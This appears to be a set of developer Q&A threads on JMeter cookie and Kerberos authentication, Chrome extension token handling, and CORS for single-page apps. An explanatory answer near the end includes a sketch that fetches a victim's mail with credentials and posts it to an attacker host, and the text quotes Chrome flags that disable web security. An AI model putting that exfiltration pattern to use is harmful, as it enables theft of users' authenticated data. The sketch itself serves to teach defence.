I'm new to JMeter and trying to create a test case. The application uses OAuth 2.0 Azure Active Directory authentication. I followed the post https://blog.pnop.co.jp/jmeter-webapps-azuread-auth_en/ and was able to make an HTTP request to the app, but in return I'm getting the error below:
We can't sign you in
Your browser is currently set to block cookies. You need to allow cookies to use this service.
Cookies are small text files stored on your computer that tell us when you're signed in. To learn how to allow cookies, check the online help in your web browser.
I have set CookieManager.save.cookies=true in user.properties, but the cookies are still giving me a hard time, even though I can see cookies being populated in the request header that is sent.
If someone has cracked a similar scenario, that would be a great help.
Thanks
Have you added HTTP Cookie Manager to your test plan?
If yes and you're still experiencing problems try:
Checking the jmeter.log file for any suspicious entries
Choosing a more "relaxed" implementation for the Cookie Manager, e.g. netscape
Adding the following line to the user.properties file:
CookieManager.check.cookies=false
A JMeter restart will be required to pick up the change
More information: HTTP Cookie Manager Advanced Usage - A Guide
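For reference, a minimal user.properties sketch combining the setting from the question with the one above (these are standard JMeter properties; restart JMeter after editing):
CookieManager.save.cookies=true
CookieManager.check.cookies=false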
I am trying to load test an application which uses Azure AD B2C authentication. I have replicated all the requests. However, there is an authorize endpoint which, when inspected in the browser, shows a few cookies in the response header.
These include an openidconnect cookie and a couple of others. However, when running this request in JMeter, I can see only the openidconnect cookie but not the others.
I need to send the other cookies in subsequent requests. I have a Cookie Manager and have also turned on the save-cookies flag in the user.properties and jmeter.properties files.
Any help is much appreciated.
Most probably it indicates some problem with the cookies, e.g. a domain/path mismatch or an expired cookie, so it sounds like an issue with your system under test.
If you don't care about the correctness of your application's functional behaviour and just want to send all incoming cookies regardless of their validity, you can try the following workarounds:
Disable JMeter's cookie-checking mechanism so everything is stored in the Cookie Manager regardless of any issues. This can be done by adding the following line to the user.properties file:
CookieManager.check.cookies=false
Switch to a less restrictive implementation, e.g. netscape, in the HTTP Cookie Manager itself.
More information: HTTP Cookie Manager Advanced Usage - A Guide
You can also enable debug logging for the Cookie Manager by adding the following line to the log4j2.xml file:
<Logger name="org.apache.jmeter.protocol.http.control" level="debug" />
Once done, you will be able to see what's going on with each incoming and outgoing cookie in the jmeter.log file.
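If it helps, the Logger element goes inside the existing <Loggers> section of log4j2.xml (found in JMeter's "bin" folder), roughly like this:
<Loggers>
    <Logger name="org.apache.jmeter.protocol.http.control" level="debug" />
    <!-- keep the Root logger and the other existing entries unchanged -->
</Loggers>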
I've seen a few posts on this but I want to highlight some specific questions I have yet to see properly answered.
My current chrome extension contains the following:
background service worker
html pages to handle login / logout (although doing this in a popup would be great)
content scripts that run a SPA on certain domains
What I would like is for a user to be able to authenticate with auth0, and then any content script running on any domain can then use an access token to hit my API.
The current challenges I've been seeing that I'm not sure how to tackle:
Ideally each running content script has its own token. This involves using the auth0 session to silently get an access token. However, since auth0 checks the origin when hitting /authorize it would mean registering every domain as an "allowed origin" which is not possible for me due to volume. Currently if I try just setting the redirectURI to my chrome extension URL, it ends up timing out. I have seen some users report this approach working, so I'm not sure if I'm doing something wrong or not, but this approach feels unsafe in retrospect.
If I instead funnel my requests through the background script, so all running content scripts effectively use a single access token, how do I refresh that access token? The documentation recommends making a call to /oauth/token which involves the client secret. My guess is this is not something I should be putting into my javascript as all of that is visible to anyone who inspects the bundle. Is that a valid concern? If so, what other approach do I have?
If I do use a manually stored refresh_token, what is the best way to keep that available? The chrome storage API says not to use it for sensitive information. Is it preferred then to keep it in local storage?
If the best option is to have the background script make all the requests on behalf of the content scripts, what is the safest way for the content scripts to make a request through the background script? I would rely on chrome.runtime.sendMessage but it seems like the API supports arbitrarily sending messages to any extension, which means other code that isn't part of the extension could also funnel requests through the background script.
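For context, here is roughly the relay I have in mind, with a sender check as a precaution (a minimal Manifest V3 style sketch; the message shape, the API host and the token handling are placeholders):
// background service worker (sketch only)
let accessToken = ''; // obtained and refreshed here, never exposed to content scripts

chrome.runtime.onMessage.addListener((message, sender, sendResponse) => {
  // only honour messages that originate from this extension itself
  if (sender.id !== chrome.runtime.id) {
    return;
  }
  if (message.type === 'apiRequest') {
    fetch('https://api.example.com' + message.path, {  // placeholder API host
      headers: { Authorization: `Bearer ${accessToken}` },
    })
      .then((res) => res.json())
      .then((data) => sendResponse({ ok: true, data }))
      .catch((err) => sendResponse({ ok: false, error: String(err) }));
    return true; // keep the channel open for the async response
  }
});

// content script side
chrome.runtime.sendMessage({ type: 'apiRequest', path: '/me' }, (response) => {
  console.log(response);
});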
More generally, I would love to hear some guidance on a safe architecture to authenticate users for a multi-domain extension.
I am also not averse to using another service, but from what I've seen so far, auth0 offers relatively good UX/DX.
I am trying to record an internal website for which I need to enter credentials that are not the same as my Windows credentials. Later on, the same test needs to be run for more than one user. I know how to use a CSV file to pass the parameters (username and password).
For Windows authentication I have added an HTTP Authorization Manager.
From Fiddler I gathered that it is NTLM authentication (though I am not sure yet), and I entered the values for NTLM authentication in the Authorization Manager.
Now when I try to record the internal website, I cannot even get to the home page after entering the Windows credentials; it keeps spinning.
When I check the Authorization Manager, I find an extra line added for Kerberos authentication, as shown in the picture:
My questions here are:
1) Why is it recording it as Kerberos?
2) Where is it saving the username and password?
3) Why is it not loading the website? It always keeps spinning and I have to stop it.
4) I have tried the Kerberos settings and then recording, but that's not working either. Could it be that I am using the wrong values in the krb5.conf file? How do I debug this?
Kind of stuck at the moment.
Thanks for the help!
If you're uncertain what authentication is being used under the hood, just ask around; application developers or network administrators should be aware of the external authentication scheme. You can also try using a third-party tool like Kerberos Authentication Tester.
I don't think you can record and replay Windows authentication, so it makes sense to start recording some time after the login screen, as long as you can log in using JMeter.
Looking into the JMeter source:
// if HEADER_AUTHORIZATION contains "Basic"
// then set Mechanism.BASIC_DIGEST, otherwise Mechanism.KERBEROS
In the case of Kerberos, credentials are saved directly in the HTTP Authorization Manager in the form of ${AUTH_LOGIN} and ${AUTH_PASSWORD}; the real credentials are not stored anywhere.
Most probably your application doesn't receive a valid authentication context and therefore cannot proceed.
Add the line sun.security.krb5.debug=true to the system.properties file (which lives in the "bin" folder of your JMeter installation); a JMeter restart will be required to pick the property up.
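For example, system.properties could end up containing something like the following (the second line is optional; sun.security.jgss.debug adds GSS-API level detail):
sun.security.krb5.debug=true
sun.security.jgss.debug=true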
More information:
Windows Authentication with Apache JMeter
JAAS and Java GSS-API Tutorials
The situation
I am writing a single-page web app (using Angular). Let's call it SPA.
A team-mate is writing some APIs (using Node.js). Let's call it Server.
My SPA is to log in to the Server using login/password, and do some stuff.
My team-mate has decided to use cookies to track the session. Hence, upon a successful login, an http-only cookie is to be set in the web browser the SPA is loaded in.
The problem
If we put the SPA in the Server's public_html dir, all works well. This, however, makes the SPA part of the API code. This breaks our build process, since every version upgrade to the SPA now requires upgrading the API too.
If we host the SPA on a separate web server that only serves the static SPA files, I run into CORS issues. Since the SPA comes from a different origin than the APIs it is trying to access, the browser blocks the Ajax calls. To overcome this, we will have to set Access-Control-Allow-Origin on the server side appropriately. I also understand that Access-Control-Allow-Credentials: true needs to be set, to instruct the browser to set/send the cookies.
Possible solutions
We create a build process which does a git-pull to the Server's public_html dir every time the SPA gets upgraded. I am trying to avoid this to keep the client and server upgrades separate.
We create a proxy kind of situation, where the Server doesn't store the SPA files, but collects them on demand from another server that hosts the SPA files. In this case, the web browser will see the SPA files and the subsequent Ajax calls as coming from the same origin.
We code the server to set Access-Control-Allow-Origin: * in its responses. Firstly, this is too open and looks insecure. Is it really insecure, or is it just my perception? Also, since we are setting Access-Control-Allow-Credentials: true, Chrome complains "Cannot use wildcard in Access-Control-Allow-Origin when credentials flag is true." To overcome this, we will have to put exact origins (perhaps using a regex) in Access-Control-Allow-Origin. This may seriously restrict us from distributing our SPA to users in unknown domains.
For a server API designer, is cookie-based authentication the recommended way to handle authentication for SPAs? OAuth 2.0 and JWT-based authentication seem to suggest that cookie-based authentication is not right for SPAs. Any pros/cons?
Kindly comment on the above options, or suggest any others that you may have used. Thanks in advance.
I think the issue is that your terminology is confusing. An API is not a server; it's an application that lives on a machine which can also be a server. If you make a Node.js API, I suggest you put an Nginx server in front of it as a reverse proxy. Assuming you want the Nginx server, the API, and the SPA files all on the same machine, you can deploy your API to one directory and your SPA to another directory and have Nginx route the requests accordingly.
So I believe solution 2 is the way to go. From there you can easily scale by increasing the number of instances (if you use AWS) and load-balancing them, or by separating your API into its own application server.
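A rough Nginx sketch of that layout (the server name, paths, and upstream port are placeholders to adjust to your setup):
server {
    listen 80;
    server_name example.com;

    # static SPA files
    location / {
        root /var/www/spa;
        try_files $uri $uri/ /index.html;
    }

    # forward API calls to the Node.js application
    location /api/ {
        proxy_pass http://127.0.0.1:3000;
        proxy_set_header Host $host;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    }
}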
As far as authentication goes, I have always preferred using an Authorization header with access tokens over cookies for SPA or API requests. The idea that each request is self-contained and does not require a persistent string kept in the browser is more appealing to me, though you can save the access token via local storage.
I would go with either solution 2 or 3.
2: you could set both (webpage and API) on the same server (or use reverse proxies) so that from an outside perspective they share the same origin.
3: in the case of an API, the same-origin policy becomes less important. The API is to be consumed by clients that are not part of your web application anyway, no?
I don't see any issue in setting a more lax allow-origin header. And by more lax I don't mean a wildcard; just add the origin of your webpage. Why do you want to wildcard it?
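A rough sketch of what that looks like on the Node.js side (Express is used here purely as an example; the origin value is a placeholder for your webpage's origin):
import express, { Request, Response, NextFunction } from 'express';

const app = express();

// allow only the SPA's origin and let the browser send the session cookie
app.use((req: Request, res: Response, next: NextFunction) => {
  res.setHeader('Access-Control-Allow-Origin', 'https://spa.example.com');
  res.setHeader('Access-Control-Allow-Credentials', 'true');
  res.setHeader('Access-Control-Allow-Headers', 'Content-Type');
  next();
});

app.get('/api/me', (req: Request, res: Response) => {
  res.json({ loggedIn: true });
});

app.listen(3000);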
As far as I know, 'Access-Control-Allow-Origin' is used as part of CORS to limit which hosts can request data from a given API server. This header's value is set by the server as part of a response.
I happened to stumble upon a Chrome extension which says:
Allow to you request any site with ajax from any source. Add to response - 'Access-Control-Allow-Origin: *' header
Developer tool.
Summary Add to response header rule - 'Allow-Control-Allow-Origin: *'
Hint Same behavior you can get just using chrome flags [http://www.chromium.org/developers/how-tos/run-chromium-with-flags]
chrome --disable-web-security
or
--allow-file-access-from-files --allow-file-access --allow-cross-origin-auth-prompt
So that means that from the client side I can change the response header. In other words, if I set 'Access-Control-Allow-Origin: http://api.example.com' on the server, this setting can be overwritten by the client with 'Access-Control-Allow-Origin: *'. Or maybe I do not want to support CORS, so I don't set it, but it will still appear as if I do support CORS.
If that is the case, what is the point of my server-side setting? Isn't it redundant?
Maybe I am being too naive here and not getting the basics of it.
CORS is a security feature to protect clients from CORF, or Cross Origin Request Forgery. It is not intended to secure servers, as a client can simply choose to ignore it.
An example of CORF would be visiting a website whose client-side code interacts with another website on your behalf, doing things like submitting data or reading data that requires authentication as you, all using your active authentication sessions.
Theoretically, without CORS, it would be possible to create a website that will fetch your email from a webmail provider (provided you are logged in at the time), and post it back to a server for malicious individuals to read.
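To make that concrete, here is a hypothetical sketch of what such a page would attempt (the URLs are placeholders) and where the browser steps in:
// running on evil.example while the victim is logged in to mail.example
fetch('https://mail.example/inbox', { credentials: 'include' })
  // unless mail.example explicitly allows evil.example via Access-Control-Allow-Origin
  // (plus Access-Control-Allow-Credentials), this promise rejects and the response
  // body is never exposed to the page's code
  .then((res) => res.text())
  .then((body) => fetch('https://evil.example/steal', { method: 'POST', body }));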
To avoid this, you shouldn't browse the web with such security features disabled. They can be turned off to ease development, not for general browsing.